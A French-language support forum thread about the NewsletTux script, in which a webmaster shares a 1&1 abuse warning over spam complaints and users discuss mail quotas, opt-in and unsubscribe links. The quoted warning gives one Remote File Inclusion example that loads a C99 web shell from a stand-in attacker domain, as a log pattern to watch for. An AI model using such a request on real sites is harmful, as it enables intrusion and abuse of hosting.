Spammeur?

[alex]

Bonjour à tous,

suite à l'envoi d'une newsletter, voici le mail reçu par 1&1:

Bonjour xxxxxxxxxxx,

Nous recevons actuellement de nombreuses plaintes concernant l'envoi de messagesnon sollicités (spam) à partir de votre espace web 1&1 (contrat : xxxxxxxx). Ces plaintes représentent un danger imminent pour votre espace web 1&1 ainsi que pour notre infrastructure d'email. Pour éviter le blocage de votre compte, contrôlez au plus vite possible l'envoid'emails à partir de votre espace web 1&1.

IMPORTANT : Veuillez en tout état de cause nous faire part des mesures que vousaurez entreprises. Pour ce faire, répondez à cet email en laissant notreréférence [Ticket xxxxxxxxxxxx] dans le l'objet de votre message. ***********************************************************************************1 Newsletter ou autre courrier de masse***********************************************************************************Si vous envoyez un bulletin d'information, newsletter ou autre courrier demasse, à respectez toutes les règles suivantes :
1.1 Confirmed Opt-In : Un envoi de messages n'est licite que si le destinatairea exprimé son consentement préalable à recevoir des prospections par ce moyen.Il faut l'inscription du destinataire ainsi que sa confirmation explicitepar la suite.
1.2 One-Click-Unsubscribe : Fournissez un lien dans chaque message quipermettra au destinataire de se désinscire par un seul click. Toutes les autresméthodes de désinscription, notamment celles qui demandent une insertion del'adresse à désinscrire, ne sont pas praticables.
1.3 Format : Si vous envoyez des e-mails en HTML, veillez à toujours ajouterune partie formatée en text seulement.
1.4 Provenance du message et le lieu de l'inscription : Insérez une phrase dansl'entête de vos e-mails comme : "Vous recevez ce message parce que vous vousêtes inscrit au forum www.mondomaine.fr . Aus cas où vous ne souhaiteriez plusrecevoir ce genre de message, veuillez cliquer ici (lien)." ***********************************************************************************2 Piratage de votre espace***********************************************************************************
Vérifiez si l'envoi se produit à votre insu, suite à un piratage de votre espaceweb. Dans ce cas, votre logiciel contient des failles de sécurité qui permettentl'intrusion de tiers et l'envoi automatisé de spam.
2.1 Stoppez l'envoi de spam : En analysant vos fichiers mail logs vous verrez si un script déclenche un envoià votre insu. Désactivez ce script tout de suite pour éviter un blocage de votrecompte.
2.2 Trouvez les failles de sécurité : En analysant vos fichiers access logs, vous verrez quels ont été les scripts quiont permis l'intrusion. Ces attaques suivent souvent le modèle :>>>/index.php?page=http://www.domaine-pirate.com/C99.php? Dans cet exemple, le script C99.php est téléchargé par la variable page. Cettetechnique est connue sous le terme anglais de 'Remote File Inclusion', voireaussi http://en.wikipedia.org/wiki/Remote_File_Inclusion (en anglais)
2.3 Fermez les failles de sécurité : Les scripts que vous aurez ainsi trouvé contiennent des failles de sécurité quidevront être fermées. Si vous utilisez des logiciels comme Joomla!, Contenido,Guppy, phpBB ou autre, une mise à jour vous apportera très souvent une meilleuresécurité.Attention : Le module "com_excalendar" de Joomla! est considéré fortementvulnérable. Il n'existe de mise à jour pour ce module depuis 2003.
2.4 Supprimez le contenu téléchargé par les pirates : Les pirates ont pu téléchargé du contenu sur votre espace web. Analysez votreentier espace et supprimez tout contenu qui vous paraît étrange. Pour toute question, veuillez répondre à cet e-mail en laissant notre référence[Ticket xxxxxxxxxx] dans l'objet de votre message. Merci de votre coopération.
Cordialement,

-- Service Abuse1&1 Internet S.A.R.L Hébergeur: 1&1 Internet AG Brauerstr. 48, 76135 Karlsruhe · Cour de registre : Amtsgericht Montabaur HRB 6484 · Comité Directeur : Henning Ahlert, Ralph Dommermuth, Matthias Ehrlich, Andreas Gauger, Thomas Gottschlich, Matthias Greve, Robert Hoffmann, Markus Huhn, Achim Weiss · Président: Michael Scheeren

Après vérification des fichiers logs, seuls 3224 mails ont été envoyés, ce qui correspond bien au nombre de membres, donc piratage peu probable!

Comment dois-je interpréter cet avertissement?
- Il s'agit d'un mail envoyé automatiquement par le serveur de l'hébergeur parce que j'ai envoyé un grand nombre de mails?
ou
- Il y a eu de réélles plaintes de SPAM?

Ca fait peur quand même!

Merci d'avance pour vos réponses.

[Matthieu]

Salut,

oui je comprends que cela fasse peur ...

1&1 proposent-ils une solution d'email de masse ? (genre un serveur SMTP dédié ?) PArce que 3000 mails en quelques "instants" sur un serveur de page perso, je comprends que ça les fasse réagir.
Ont-ils un quota de mail ?

Quoiqu'il en soit, je n'ai pas mis en place de système *nativement* pour scinder les envois. Toutefois, il est possible de diviser les abonnés en différents profils (par exemple, un profil n'aura max que 800 abonnés, ce qui fait 4 profils pour tes 3200 personnes) et d'envoyer la newsletter à un profil, puis 24h après, un second profil, etc ...

Mais je pense que pour plus de 3000 inscrits, tu dois avoir un serveur dédié, non ?

En ce qui concerne les "clauses" qu'ils énoncent, voici à chaud mes réactions :

1 Confirmed Opt-In : Un envoi de messages n'est licite que si le destinatairea exprimé son consentement préalable à recevoir des prospections par ce moyen.Il faut l'inscription du destinataire ainsi que sa confirmation explicitepar la suite.

C'est tout à fait faisable avec NewsletTux, il suffit de demander la validation du mail par l'abonné (cf. la configuration des inscriptions)

1.2 One-Click-Unsubscribe : Fournissez un lien dans chaque message quipermettra au destinataire de se désinscire par un seul click. Toutes les autresméthodes de désinscription, notamment celles qui demandent une insertion del'adresse à désinscrire, ne sont pas praticables.

Ce n'est pas *exactement ça* mais presque : d'un clic, ils se font envoyer le lien par mail de désinscription (ça évite que n'importe qui désinscrive n'importe quelle adresse mail ...)

1.3 Format : Si vous envoyez des e-mails en HTML, veillez à toujours ajouterune partie formatée en text seulement.

C'est faisable avec le template, sans template, c'est du texte ... Et c'est aussi l'une des raisons pour lesquelles NewsletTux propose nativement les formats texte et HTML.

1.4 Provenance du message et le lieu de l'inscription : Insérez une phrase dansl'entête de vos e-mails comme : "Vous recevez ce message parce que vous vousêtes inscrit au forum www.mondomaine.fr . Aus cas où vous ne souhaiteriez plusrecevoir ce genre de message, veuillez cliquer ici (lien)."

Le lien de gestion des abonnements est toujours présent dans les newsletters, et la phrase de l'entête, il est vrai, est laissée au goût de chaque webmaster (vu que le script est multilangue).

Vérifiez si l'envoi se produit à votre insu, suite à un piratage de votre espaceweb. Dans ce cas, votre logiciel contient des failles de sécurité qui permettentl'intrusion de tiers et l'envoi automatisé de spam.

S'il y a piratage, c'est soit le mot de passe root qui est mal sécurisé, soit une faille sur la config serveur (faille Sessions PHP, faille Apache ... !)

2.2 Trouvez les failles de sécurité : En analysant vos fichiers access logs, vous verrez quels ont été les scripts quiont permis l'intrusion. Ces attaques suivent souvent le modèle :>>>/index.php?page=http://www.domaine-pirate.com/C99.php? Dans cet exemple, le script C99.php est téléchargé par la variable page. Cettetechnique est connue sous le terme anglais de 'Remote File Inclusion', voireaussi http://en.wikipedia.org/wiki/Remote_File_Inclusion (en anglais)

cf. faille Apache/Session PHP

2.3 Fermez les failles de sécurité : Les scripts que vous aurez ainsi trouvé contiennent des failles de sécurité quidevront être fermées. Si vous utilisez des logiciels comme Joomla!, Contenido,Guppy, phpBB ou autre, une mise à jour vous apportera très souvent une meilleuresécurité.Attention : Le module "com_excalendar" de Joomla! est considéré fortementvulnérable. Il n'existe de mise à jour pour ce module depuis 2003.

Aucun code de ces applications n'a été utilisé dans NewsletTux.

[alex]

Merci Matthieu pour ta rapidité de réaction, pour faire bref voici mes réponses à tes interrogations:

- serveur SMTP dédié: aucune idée! Ce sont des packs qu'ils proposent! Pour info, le mien est le plus basique: "Pack perso initial"

- Quota de mails: je n'ai aucune information sur cela, du moins, il n'en parle pas!

- Effectivement, le système des différents profils seraient un plus pour le ciblage (mais inscription plus lourde pour l'internaute)

- Serveur dédié, non, ce n'est que le "Pack perso initial"

Pour le reste de tes réactions, je ne pense pas que le défaut vienne de là, mais certaines choses peuvent peut être t'aider à améliorer Newslettux. (ce pourquoi, j'ai posté ce sujet)


J'aimerais quand même avoir ton avis sur ce point principal qui pour moi est essentiel:
Comment dois-je interpréter cet avertissement?
- Il s'agit d'un mail envoyé automatiquement par le serveur de l'hébergeur parce que j'ai envoyé un grand nombre de mails?
ou
- Il y a eu de réélles plaintes de SPAM?


Parce que si il y a eu plainte, que dois-je faire? Pour info, aucune désinscription n'a eu lieu suite à cette newsletter!

[Andy]

Merci Matthieu pour ta rapidité de réaction, pour faire bref voici mes réponses à tes interrogations:

- serveur SMTP dédié: aucune idée! Ce sont des packs qu'ils proposent! Pour info, le mien est le plus basique: "Pack perso initial"

- Quota de mails: je n'ai aucune information sur cela, du moins, il n'en parle pas!

- Effectivement, le système des différents profils seraient un plus pour le ciblage (mais inscription plus lourde pour l'internaute)

- Serveur dédié, non, ce n'est que le "Pack perso initial"

Pour le reste de tes réactions, je ne pense pas que le défaut vienne de là, mais certaines choses peuvent peut être t'aider à améliorer Newslettux. (ce pourquoi, j'ai posté ce sujet)


J'aimerais quand même avoir ton avis sur ce point principal qui pour moi est essentiel:
Comment dois-je interpréter cet avertissement?
- Il s'agit d'un mail envoyé automatiquement par le serveur de l'hébergeur parce que j'ai envoyé un grand nombre de mails?
ou
- Il y a eu de réélles plaintes de SPAM?


Parce que si il y a eu plainte, que dois-je faire? Pour info, aucune désinscription n'a eu lieu suite à cette newsletter!

Salut,

Voici quelques infos

Quels sont les quotas sur les expéditions de mails depuis 1&1 ?
Deux catégories sont présentes lors de l’envoi de mails depuis l’infrastructure de 1&1 Internet.

 Expédition depuis les serveurs SMTP 

Les envois de mails depuis les serveurs SMTP sont soumis à des différents quotas pour des raisons de performances.
 Connexions SMTP en parallèles : 10
 Taille maximale d’un email : 10Mo (Mail + Pièce(s) jointe(s) )
 Cadence pour l’expédition : 300 Mails / 5 minutes (3600 Mail / heure)


 Expédition depuis l’Espace Web 

Les envois de mails depuis l’Espace Web via la fonction mail() de PHP sont soumis aux limitations suivantes :
 Ratio Séquentiel : 1/seconde
 Taille maximale d’un email : 10Mo (Possible de monter jusqu’à 50Mo en fonction du destinataire)
 Cadence pour l’expédition : 200 000 Mails par jour
 

Comment dois-je interpréter cet avertissement?
Peut-être prendre contact et leur expliquer qu'il ne s'agit pas de spam et profiter pour avoir quelques renseignements sur le quota pour être sûr.

[Matthieu]

Pour moi, sur un plan technique,et sous réserve que tu n'aies en rien modifié le script, les gens peuvent tout à fait se désinscrire (et toutes leurs infos seront effacées de la base) donc c'est plutôt un "warning" qu'un "je te tape sur les doigts".

Si tu as le pack de base, alors tu n'as pas un serveur dédié et pour ce qui est du SMTP de masse, je t'avoue ne pas connaitre suffisamment 1&1 pour ça.

Je pense que pour un "petit site", voir 3000 mails partir d'un coup, ça a du leur faire peur. Tu peux éventuellement les rediriger sur ce topic pour leur montrer ma réponse, s'il s'agit d'une personne humaine qui a rédigé cet avertissement et non d'un message à déclenchement automatique. Mais je te conseille de voir pour scinder tes abonnés également ... Au mieux je peux te faire un mod pour ça.

concernant le quota, ça fait 1 mail par seconde, et dans mon script, dans la page "send_newsletter.php", ligne 213 :

Code:

RedirectTo($uri, 4000);

On a 20 mails qui partent toutes les 4 secondes, on est en deçà du quota ...


(par contre, point positif : NewsletTux a marché avec 3000 abonnés  )

[alex]

Merci Matthieu et Andy,

je vais maintenant répondre à leur mail via le numéro de ticket qu'ils m'ont fourni.

En tout état de cause, je ne pense qu'il s'agisse réélement de "plaintes" comme 1&1 le sous entend dès le début.

Je vous tiens informé de la suite des événements.

A bientôt.

[Matthieu]

Au vu de leur message, je ne crois pas, ou alors ils l'auraient clairement dit. Là ils ont dit "vous avez envoyé XXX mails, faites attention à ce que ça soit bien vous qui les ayiez envoyés, à ce que votre script ne soit pas ou bien victieme d'une faille de sécurité, ou bien mal foutu pour tourner en boucle, et vérifiez que les gens puissent bien se désinscrire manuellement". (comme le veut la CNIL en france).

Maintenant entre leur méthode mail et leur méthode SMTP, je ne sais pas laquelle est la moins lourde pour leur serveur au vu des quotas ... c'est étrange qu'avec le SMTP on ne puisse envoyer que 86400 mails par jour contre 200 mille via mail de php ... En général j'ai plutôt vu l'inverse.

[alex]

Voici la réponse de 1&1:

Bonjour xxxxxxx,

Merci de bien vouloir integrer les améliorisations mentionnés dans votre news-letter. C'est à dire:
- format mutlitpart/alternative
- lien de sèsiscription "directe" - votre lien actuel ne porte pas l'information du compte inscrit

Les plaintes qui ont provoqué notre avertissement sont bien réels. Par contre il se peut que pour les recipients qui ont un compte hotmail c'est msn qui décide à leur place d'envoyer une plainte. Ce comportement n'est pas en accord avec les normes de ce genre de plainte et n'est pas vérifié. L'expérience a montré que les newsletters plus personalisées sont moins souvent frappées de ce genre de plaintes. Il est donc fortement conseillé d'adresser vos "clients" avec leur nom ou pseudo dans le message.

Cordialement, [...]

Qu'en pensez-vous?

A noter, que effectivement 99% (pour pas dire 100%) des adresses sont des hotmail!

[djamel]

Peut être peux tu envoyer tes messages par groupe de 20 mais espacés de quelques heures ?

Je pense que cela est possible. Mais, c'est vrai que si tout les emails sont chez hotmail, cela complique un peu l'affaire !

A plus

Djamel

[Matthieu]

Surtout hotmail qui est assez ... draconien.

Concernant leurs demandes :

- format mutlitpart/alternative

Il suffit que tu proposes un format texte préférentiellement à l'HTML...

- lien de sèsiscription "directe" - votre lien actuel ne porte pas l'information du compte inscrit

pour une raison de sécurité du profil, ce n'est pas nativement inclus dans NewsletTux, mais je peux faire un mod pour ça ...
Enfin, toujours est-il que même non natif, rien n'empêche quelqu'un de se désinscrire, c'est facile et rapide.

J'ai personnellement horreur des liens du type desinscription.php?email=turlututu@chapo.tu parce que n'importe quel spammeur qui trouvera l'URL de désinscription peut à tout moment te spammer en tentant d'appeler cette URL avec autant d'emails qu'il le veut, et ainsi désinscrire plusieurs de tes abonnés ...

Ceci dit, on peut prévoir d'insérer le lien personnalisé, pourquoi pas, si ça te tente ... ça ressemblera à un lien du type form-newslettux.php?e=turlututu@chapo.tu&a=unsubscribe par exemple. (ou bien la page incluant le formulaire, si tu "include" form-newslettux dans une autre page PHP)

[alex]

Concernant le format, il est vrai que je ne propose que le html, car en texte mes newsletters ne ressemblent plus à rien! (contenu avec images). Mais bon, je ne pense pas que cela ait vraiment une importance! Pour faire plaisir à hotmail, je vais remettre le choix lors de l'inscription.

Pour ce qui est du lien de désinscription, je n'ai rien à y redire, c'est ultra simple!

Par contre autre problème, j'ai dis au tout début de ce sujet que je n'avais eu aucune désinscription! Et bien ... erreur de ma part! Il y en a eu! Sur la version 1.85 (il me semble ou 1.65), lorsqu'une personne se désinscrivait on recevait un mail. Mais apparemment pour la v2, on en reçoit plus! Il ne me reste plus que 3207 membres sur 3224 (ou 3214, je n'ai pas fais attention, je me souviens juste que du 4 à la fin). Cela voudrait donc dire, comme hotmail le dit, que les plaintes sont bien réélles. Ce serait donc certainement ces membres désinscrits qui ont d'abord déclaré ma newsletter comme spam. Certainement en n'ayant pas fais attention qu'il ont déclaré une newsletter comme spam, alors qu'ils s'y sont inscrits!

On verra pour la newsletter envoyée à l'occasion de la fête des pères!

[Matthieu]

Concernant le format, il est vrai que je ne propose que le html, car en texte mes newsletters ne ressemblent plus à rien! (contenu avec images). Mais bon, je ne pense pas que cela ait vraiment une importance! Pour faire plaisir à hotmail, je vais remettre le choix lors de l'inscription.

Non, c'est pour ton hébergeur ...

Pour ce qui est du lien de désinscription, je n'ai rien à y redire, c'est ultra simple!

Par contre autre problème, j'ai dis au tout début de ce sujet que je n'avais eu aucune désinscription! Et bien ... erreur de ma part! Il y en a eu! Sur la version 1.85 (il me semble ou 1.65), lorsqu'une personne se désinscrivait on recevait un mail. Mais apparemment pour la v2, on en reçoit plus! Il ne me reste plus que 3207 membres sur 3224 (ou 3214, je n'ai pas fais attention, je me souviens juste que du 4 à la fin). Cela voudrait donc dire, comme hotmail le dit, que les plaintes sont bien réélles. Ce serait donc certainement ces membres désinscrits qui ont d'abord déclaré ma newsletter comme spam. Certainement en n'ayant pas fais attention qu'il ont déclaré une newsletter comme spam, alors qu'ils s'y sont inscrits!

On verra pour la newsletter envoyée à l'occasion de la fête des pères!

c'était effectivement la version 1.6.5., et sur la v2 je n'ai pas inclus cette notification.

EDIT : en allant dans outils > Statistiques, tu as des stats sur les désinscriptions, par profil et par mois ... Donc ça évite de recevoir un mail à chaque fois, mais tu sais à tout moment combien d'inscrits tu as gagné ou perdu ...

[alex]

Concernant le format, il est vrai que je ne propose que le html, car en texte mes newsletters ne ressemblent plus à rien! (contenu avec images). Mais bon, je ne pense pas que cela ait vraiment une importance! Pour faire plaisir à hotmail, je vais remettre le choix lors de l'inscription.

Non, c'est pour ton hébergeur ...

Oui, je me suis trompé! Pour faire plaisir à 1&1!

Concernant, les stats, elles ne me révélent aucune désinscription! Et pourtant je suis persuadé d'avoir moins d'abonnés! Peut être que je me trompe encore?

Aujourd'hui, envoi d'un mail, on verra si j'ai encore le même problème.

[moncler]

Bonjour,
Je suis nouveau sur le forum, je teste en ce moment newslettux et c'est un vrai bonheur (surtout comparer au petit script perso que j'utilisais)
Concernant la desinscription, pour ma part j'aimerais bien mettre sur chaque news letter un lien direct de desincription.

- lien de sèsiscription "directe" - votre lien actuel ne porte pas l'information du compte inscrit

pour une raison de sécurité du profil, ce n'est pas nativement inclus dans NewsletTux, mais je peux faire un mod pour ça ...
Enfin, toujours est-il que même non natif, rien n'empêche quelqu'un de se désinscrire, c'est facile et rapide.

J'ai personnellement horreur des liens du type desinscription.php?email=turlututu@chapo.tu parce que n'importe quel spammeur qui trouvera l'URL de désinscription peut à tout moment te spammer en tentant d'appeler cette URL avec autant d'emails qu'il le veut, et ainsi désinscrire plusieurs de tes abonnés ...

Ceci dit, on peut prévoir d'insérer le lien personnalisé, pourquoi pas, si ça te tente ... ça ressemblera à un lien du type form-newslettux.php?e=turlututu@chpoa.tu&a=unsubscribe par exemple. (ou bien la page incluant le formulaire, si tu "include" form-newslettux dans une autre page PHP)

Pourquoi pas ne pas inserer dans le lien en parametre dans le lien de desinscription par exemple le mot de pass pour verifier que l'adresse email a desinscrire n'est pas modifiée par un petit malin qui voudrait descinscrire autre que son compte?

Voila voila, toute aide est la bienvenue et encore bravo pour ce super script.

Cdlt

[Matthieu]

Salut,
Le lien de gestion des abonnements est directement présent dans la newsletter (et obligatoire). Concernant le mot de passe, c'est qu'il faut modifier la façon dont je récupère les informations sur les abonnés ... Mais ça peut être envisageable.

PS : pense à créer un nouveau sujet la prochaine fois ...